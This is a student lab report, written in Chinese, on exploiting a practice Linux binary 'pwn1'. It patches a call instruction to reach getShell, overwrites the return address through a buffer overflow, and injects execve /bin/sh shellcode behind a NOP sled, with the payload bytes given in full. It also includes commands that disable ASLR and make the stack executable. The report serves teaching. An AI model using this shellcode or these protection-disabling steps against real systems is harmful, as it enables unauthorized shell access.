20155330 《网络攻防》Exp1 PC平台逆向破解(5)M
实践目标
运行pwn1可执行文件中的getshell函数,学习如何注入运行任何Shellcode
本次实践的对象是一个名为pwn1的linux可执行文件。
实践内容
- 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
- 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
- 注入一个自己制作的shellcode并运行这段shellcode。
基本思路
- 运行原本不可访问的代码片段
- 强行修改程序执行流
- 以及注入运行任意代码。
相关知识
- 熟悉Linux基本操作
- 能看懂常用指令,如管道(|),输入、输出重定向(>)等。
- 理解Bof的原理。
- 能看得懂汇编、机器指令、EIP、指令地址。
- 会使用gdb,vi。
- 指令
- NOP:通过nop指令的填充(nop指令一个字节),使指令按字对齐,从而减少取指令时的内存访问次数。(机器码:90)
- JNE:条件转移指令,如果不相等则跳转。(机器码:75)
- JE:条件转移指令,如果相等则跳转。(机器码:74)
- JMP:无条件转移指令。
- 段内直接短转Jmp short(机器码:EB)
- 段内直接近转移Jmp near(机器码:E9)
- 段内间接转移Jmp word(机器码:FF)
- 段间直接(远)转移Jmp far(机器码:EA)
- CMP:比较指令,相当于减法指令,只是不保存结果。执行后,对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。
-
机器码
|机器码|指令功能|
|--|--|
|38|CMP reg8/mem8,reg8|
|39| CMP reg16/mem16,reg16|
|3A| CMP reg8,reg8/mem8|
|3B| CMP reg16,reg16/mem16|
|3C |CMP al,immed8|
|3D |CMP ax,immed16|
-
一、直接修改程序机器指令,改变程序执行流程
-
首先对
pwn1
文件进行反汇编 查看main函数调用foo的地址值,foo函数的第一条指令的地址值,和需要修改的getShell函数第一条指令的地址值。由下图可知,main函数调用foo对应机器指令为
e8 d7ffffff
,由于要将调用的函数更改为getShell,则需修改d7 ff ff ff
为getShell-80484ba
对应的补码,通过计算47d-4ba
得到补码,main函数调用getShell对应机器指令为c3 ff ff ff
。使用VIM编辑器对
pwn1
文件进行编辑。文件显示为乱码,用%!xxd
命令将显示模式切换为16进制模式输入
/e8 d7
查找要修改的内容,修改d7
为c3
,用命令%!xxd -r
将16进制转换为原格式,wq
存盘退出。再次将文件反汇编,可以看到地址
80484b5
的机器指令d7
变更为c3
,main函数调用getShell
-
运行文件。(在实践过程中重新备份了pwn1文件为pwn2,以上步骤为备份前截图,备份后将pwn1文件修改为原文件。)
二、通过构造输入参数,造成BOF攻击,改变程序执行流
-
目标:触发
getShell
函数 -
pwn1
可执行文件正常运行是调用如下函数foo,这个函数有Buffer overflow漏洞 -
读入字符串,但系统只预留了__字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址
-
main函数中call调用foo,同时在堆栈上压上返回地址值:80484ba
-
确认输入字符串哪几个字符会覆盖到返回地址
-
gdb pwn3_155330
调试可执行文件,r
运行,info r
查看寄存器eip(即将执行的指令地址)的值 -
再次运行,将后八位值更改后发现eip值改变。1234 四个数最终会覆盖到堆栈上的返回地址,进而CPU会尝试运行这个位置的代码。将这四个字符替换为 getShell 的内存地址,输给pwn,pwn1就会运行getShell。
-
-
确认用什么值来覆盖返回地址
- 通过反汇编时可以看到getShell的内存地址为
0804847d
。接下来要确认下字节序,简单说是输入\x08\x04\x84\x7d
,还是输入\x7d\x84\x04\x08
。对比之前的eip,该终端采用小端方式,正确应用输入\x7d\x84\x04\x08
。 - 由为我们没法通过键盘输入
\x7d\x84\x04\x08
这样的16进制值,所以先生成包括这样字符串的一个文件。\x0a
表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。 - 用perl命令生成字符串并重定向
>
到input
文件中。
- 使用16进制查看指令xxd查看input文件的内容
- 将input的输入,通过管道符“|”,作为pwn1的输入。
- 通过反汇编时可以看到getShell的内存地址为
三、注入Shellcode并执行
-
准备一段Shellcode
- shellcode就是一段机器指令(code)
- 通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),所以这段机器指令被称为shellcode。
- 在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。
-
execstack -s pwn1
设置堆栈可执行。 -
apt-get install execstack
获取安装。 execstack -q pwn1
查询文件的堆栈是否可执行。并依次执行以下命令。
more /proc/sys/kernel/randomize_va_space
echo "0" > /proc/sys/kernel/randomize_va_space
more /proc/sys/kernel/randomize_va_space
构造要注入的payload。
-
Linux下有两种基本构造攻击buf的方法:
- retaddr+nop+shellcode
- nop+shellcode+retaddr。
因为retaddr在缓冲区的位置是固定的,shellcode要不在它前面(缓冲区大),要不在它后面(缓冲区小)。
-
结构为:nops+shellcode+retaddr。
- nop一为是了填充,二是作为“着陆区/滑行区”。
- 猜测的返回地址只要落在任何一个nop上,就能滑到shellcode。
输入
perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode
,最后的\x4\x3\x2\x1
将覆盖到堆栈上的返回地址的位置。把\x4\x3\x2\x1
改为这段shellcode的地址。打开一个终端注入这段攻击buf
(cat input_shellcode;cat) | ./pwn4_155330
再开另外一个终端,用gdb来调试进程。
ps -ef | grep pwn4_155330
查看进程号。grep pwn4_155330
的进程号是2481
gdb调试这个进程,查看注入buf的内存地址
-
设置断点
-
继续运行
-
查看esp寄存器值,
-
计算出地址值为
d300
,修改地址重定向到input_shellcode文件